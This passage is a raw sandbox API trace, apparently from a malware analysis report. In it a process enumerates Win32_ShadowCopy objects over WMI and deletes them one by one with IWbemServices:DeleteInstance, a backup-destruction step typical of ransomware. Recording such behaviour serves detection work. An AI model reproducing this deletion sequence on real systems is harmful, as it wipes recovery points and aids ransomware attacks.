pszText=0x0) returned 0x0 [0130.654] WbemDefPath:IWbemPath:GetText (in: This=0x1c9033d0, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"") returned 0x0 [0130.654] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0130.654] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0130.655] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0130.655] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0130.655] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0130.655] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0130.655] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0130.655] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0130.655] IWbemClassObject:Get (in: This=0x1c90ff20, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0130.655] WbemDefPath:IWbemPath:GetText (in: This=0x1c9033d0, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0130.655] WbemDefPath:IWbemPath:GetText (in: This=0x1c9033d0, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"") returned 0x0 [0130.655] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0131.685] CoTaskMemAlloc (cb=0x8) returned 0x27f6b0 [0131.685] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x27f6b0, puReturned=0x1c64d8b8 | out: apObjects=0x27f6b0*=0x1c9101d0, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0131.686] IUnknown:QueryInterface (in: This=0x1c9101d0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c9101d0) returned 0x0 [0131.686] IUnknown:QueryInterface (in: This=0x1c9101d0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0131.686] IUnknown:QueryInterface (in: This=0x1c9101d0, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0131.687] IUnknown:AddRef (This=0x1c9101d0) returned 0x3 [0131.687] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0131.687] IUnknown:QueryInterface (in: This=0x1c9101d0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c9101d8) returned 0x0 [0131.687] IMarshal:GetUnmarshalClass (in: This=0x1c9101d8, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0131.687] IUnknown:Release (This=0x1c9101d8) returned 0x3 [0131.687] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0131.687] IUnknown:AddRef (This=0x1c9101d0) returned 0x4 [0131.687] IUnknown:QueryInterface (in: This=0x1c9101d0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0131.687] IUnknown:Release (This=0x1c9101d0) returned 0x3 [0131.687] IUnknown:Release (This=0x1c9101d0) returned 0x2 [0131.688] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0131.688] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0131.688] IUnknown:AddRef (This=0x1c9101d0) returned 0x3 [0131.688] IUnknown:QueryInterface (in: This=0x1c9101d0, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c9101d0) returned 0x0 [0131.688] IUnknown:Release (This=0x1c9101d0) returned 0x3 [0131.688] IUnknown:Release (This=0x1c9101d0) returned 0x2 [0131.688] IUnknown:Release (This=0x1c9101d0) returned 0x1 [0131.688] CoTaskMemFree (pv=0x27f6b0) [0131.688] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0131.688] IUnknown:AddRef (This=0x1c9101d0) returned 0x2 [0131.688] IWbemClassObject:Get (in: This=0x1c9101d0, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0131.688] IWbemClassObject:Get (in: This=0x1c9101d0, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0131.688] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"") returned 0x53 [0131.689] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0131.689] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0131.689] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0131.689] IUnknown:Release (This=0x212498) returned 0x1 [0131.689] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c90a3d0) returned 0x0 [0131.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c90a3d0, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0131.690] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c90a3d0, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c903490) returned 0x0 [0131.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903490, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c903490) returned 0x0 [0131.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903490, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0131.690] WbemDefPath:IUnknown:AddRef (This=0x1c903490) returned 0x3 [0131.690] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0131.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903490, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b793770) returned 0x0 [0131.690] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b793770, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0131.690] WbemDefPath:IUnknown:Release (This=0x1b793770) returned 0x3 [0131.691] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0131.691] WbemDefPath:IUnknown:AddRef (This=0x1c903490) returned 0x4 [0131.691] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903490, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0131.691] WbemDefPath:IUnknown:Release (This=0x1c903490) returned 0x3 [0131.691] WbemDefPath:IUnknown:Release (This=0x1c903490) returned 0x2 [0131.691] WbemDefPath:IUnknown:Release (This=0x1c90a3d0) returned 0x0 [0131.691] WbemDefPath:IUnknown:Release (This=0x1c903490) returned 0x1 [0131.691] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0131.691] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0131.691] WbemDefPath:IUnknown:AddRef (This=0x1c903490) returned 0x2 [0131.691] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903490, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c903490) returned 0x0 [0131.691] WbemDefPath:IUnknown:Release (This=0x1c903490) returned 0x2 [0131.691] WbemDefPath:IUnknown:Release (This=0x1c903490) returned 0x1 [0131.692] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0131.692] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0131.692] WbemDefPath:IUnknown:AddRef (This=0x1c903490) returned 0x2 [0131.692] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903490, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c903490) returned 0x0 [0131.692] WbemDefPath:IUnknown:Release (This=0x1c903490) returned 0x2 [0131.692] WbemDefPath:IUnknown:AddRef (This=0x1c903490) returned 0x3 [0131.692] WbemDefPath:IWbemPath:SetText (This=0x1c903490, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"") returned 0x0 [0131.692] WbemDefPath:IUnknown:Release (This=0x1c903490) returned 0x2 [0131.692] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0131.692] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0131.692] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0131.692] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0131.692] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0131.692] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0131.692] IWbemClassObject:Get (in: This=0x1c9101d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0131.693] SysStringLen (param_1="root\\cimv2") returned 0xa [0131.693] IWbemClassObject:Get (in: This=0x1c9101d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0131.693] SysStringLen (param_1="root\\cimv2") returned 0xa [0131.693] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0131.693] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0131.693] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0131.693] IWbemClassObject:Get (in: This=0x1c9101d0, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0131.693] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0131.693] IWbemClassObject:Get (in: This=0x1c9101d0, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0131.693] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0131.790] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c903490, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0131.790] WbemDefPath:IWbemPath:GetText (in: This=0x1c903490, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0131.790] WbemDefPath:IWbemPath:GetText (in: This=0x1c903490, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"") returned 0x0 [0131.790] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0131.790] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0131.790] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0131.790] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0131.790] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0131.790] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0131.791] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0131.791] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0131.791] IWbemClassObject:Get (in: This=0x1c9101d0, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0131.791] WbemDefPath:IWbemPath:GetText (in: This=0x1c903490, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0131.791] WbemDefPath:IWbemPath:GetText (in: This=0x1c903490, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"") returned 0x0 [0131.791] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0132.791] CoTaskMemAlloc (cb=0x8) returned 0x27f6b0 [0132.791] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x27f6b0, puReturned=0x1c64d8b8 | out: apObjects=0x27f6b0*=0x1c90ff20, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0132.793] IUnknown:QueryInterface (in: This=0x1c90ff20, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c90ff20) returned 0x0 [0132.793] IUnknown:QueryInterface (in: This=0x1c90ff20, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0132.793] IUnknown:QueryInterface (in: This=0x1c90ff20, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0132.793] IUnknown:AddRef (This=0x1c90ff20) returned 0x3 [0132.793] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0132.793] IUnknown:QueryInterface (in: This=0x1c90ff20, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c90ff28) returned 0x0 [0132.793] IMarshal:GetUnmarshalClass (in: This=0x1c90ff28, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0132.793] IUnknown:Release (This=0x1c90ff28) returned 0x3 [0132.794] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0132.794] IUnknown:AddRef (This=0x1c90ff20) returned 0x4 [0132.794] IUnknown:QueryInterface (in: This=0x1c90ff20, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0132.794] IUnknown:Release (This=0x1c90ff20) returned 0x3 [0132.794] IUnknown:Release (This=0x1c90ff20) returned 0x2 [0132.794] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0132.794] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0132.794] IUnknown:AddRef (This=0x1c90ff20) returned 0x3 [0132.794] IUnknown:QueryInterface (in: This=0x1c90ff20, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c90ff20) returned 0x0 [0132.794] IUnknown:Release (This=0x1c90ff20) returned 0x3 [0132.794] IUnknown:Release (This=0x1c90ff20) returned 0x2 [0132.794] IUnknown:Release (This=0x1c90ff20) returned 0x1 [0132.795] CoTaskMemFree (pv=0x27f6b0) [0132.795] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0132.795] IUnknown:AddRef (This=0x1c90ff20) returned 0x2 [0132.795] IWbemClassObject:Get (in: This=0x1c90ff20, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0132.795] IWbemClassObject:Get (in: This=0x1c90ff20, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), 